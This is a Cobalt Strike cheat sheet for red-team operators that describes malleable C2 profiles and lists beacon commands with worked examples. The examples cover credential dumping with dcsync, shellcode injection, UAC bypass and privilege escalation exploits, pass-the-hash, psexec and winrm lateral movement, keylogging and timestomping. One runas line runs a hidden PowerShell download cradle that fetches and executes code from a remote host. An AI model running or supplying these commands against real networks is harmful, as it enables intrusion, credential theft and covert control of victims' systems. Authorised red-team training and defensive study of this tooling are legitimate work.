Home

Awesome

Cobalt Strike CheatSheet

General notes and advices for cobalt strike C2 framework.

Summary

Basic Menu Explanation

Listeners

Egress Listeners

Pivot Listeners

Miscellaneous Listeners

Malleable C2 Profiles

In simple words a malleable c2 profile is a configuration file that defines how beacon will communicate and behave when executes modules, spawns processes and threads, injects dlls or touches disk and memory. Not only that, but it configures how the payload's traffic will look like on a pcap, the communication interval and jitter etc.

The big advantage of custom malleable c2 profiles, is that we can configure and customize our payload to match our situation and target environment, that way we make our selves more stealthy as we can blend with the environment's traffic.

Aggressor Scripts

Aggressor Script is the scripting language built into Cobalt Strike, version 3.0, and later. Aggresor Script allows you to modify and extend the Cobalt Strike client. These scripts can add additional functions on existing modules or create new ones.
Aggressor Script Tutorial

Common Commands

sleep [time in seconds] [jitter]

i.e.

sleep 5 60
sleep 120 40
...
download C:\Users\victim\Documents\passwords.csv
upload C:\Users\S1ckB0y1337\NotMalware\youvebeenhacked.txt

Exploitation

dcsync [DOMAIN.fqdn] [DOMAIN\user]

i.e.

dcsync CORP.local CORP\steve.johnson
desktop [pid] [x86|x64] [high|low]

i.e.

desktop 592 x64 high
desktop 8841 x86 low

:exclamation: The high/low arguments specify the quality of the session.

execute-assembly [/path/to/local/.NET] [arguments]
inject [pid] [x86|x64] [listener]

i.e.

inject 9942 x64 Lab-SMB
inject 429 x86 Lab-HTTPS
...
shspawn [x86|x64] [/path/to/my.bin]

i.e.

shspawn x64 /opt/shellcode/malicious.bin

Privilege Escalation

elevate [exploit] [listener]

i.e.

elevate juicypotato Lab-SMB
elevate ms16-032 Lab-HTTPS
...
runasadmin [exploit] [command] [args]

i.e.

runasadmin uac-token-duplication [command]
runasadmin uac-cmstplua [command] 

Pivoting

socks [port]

i.e.

socks 9050

:exclamation: This requires your /etc/proxychains.conf to be configured to match the port specified. If operating on Windows, your proxychains.conf file may be located in %USERPROFILE%.proxychains\proxychains.conf, (SYSCONFDIR)/proxychains.conf, or (Global programdata dir)\Proxychains\proxychains.conf.

Lateral Movement

portscan [ip or ip range] [ports]

i.e.

portscan 172.16.48.0/24 1-2048,3000,8080

The above command will scan the entire 172.16.48.0/24 subnet on ports 1 to 2048, 3000 and 8080. This can be utilized for single IPs as well.

runas [DOMAIN\user] [password] [command] [arguments]

i.e.

runas CORP\Administrator securePassword12! Powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.50.90:80/filename'))"
pth [DOMAIN\user] [hash]
pth Administrator 97fc053bc0b23588798277b22540c40d
pth CORP\Administrator 97fc053bc0b23588798277b22540c40d
jump [psexec64,psexec,psexec_psh,winrm64,winrm] [server/workstation] [listener]

i.e.

jump psexec64 DC01 Lab-HTTPS
jump winrm WS04 Lab-SMB
jump psexec_psh WS01 Lab-DNS
...
remote-exec [method] [target] [command]

Exflitration

keylogger [pid] [x86|x64]

i.e.

keylogger 8932 x64
keylogger
...

This command can also be used without specifying arguments to spawn a temporary process and inject the keystroke logger into it.

screenshot [pid] [x86|x64] [run time in seconds]

i.e.

screenshot 1042 x64 15
screenshot 773 x86 5

Miscellaneous

spawn [x86|x64] [listener]

i.e.

spawn x64 Lab-HTTPS
spawn x86 Lab-SMB
...
spawnas [DOMAIN\user] [password] [listener]

i.e.

spawnas CORP\bob.smith baseBall1942 Lab-SMB
spawnas Administrator SuperS3cRetPaSsw0rD Lab-HTTPS
...
spawnto [x86|x64] [c:\path\to\whatever.exe] 

i.e.

spawnto x64 c:\programdata\beacon.exe
spawnto x86 c:\users\S1ckB0y1337\NotMalware\s1ck.exe
spawnu [pid] [listener]

i.e.

spawnu 812 Lab-SMB
spawnu 9531 Lab-DNS
...
blockdlls [start|stop]
timestomp [fileA] [fileB]

i.e.

timestomp C:\Users\S1ckB0y1337\Desktop\logins.xlsx C:\Users\S1ckB0y1337\Desktop\notmalicious.xlsx

OPSEC Notes

EDR Evasion Tools and Methods

General Post-Exploitation TIPS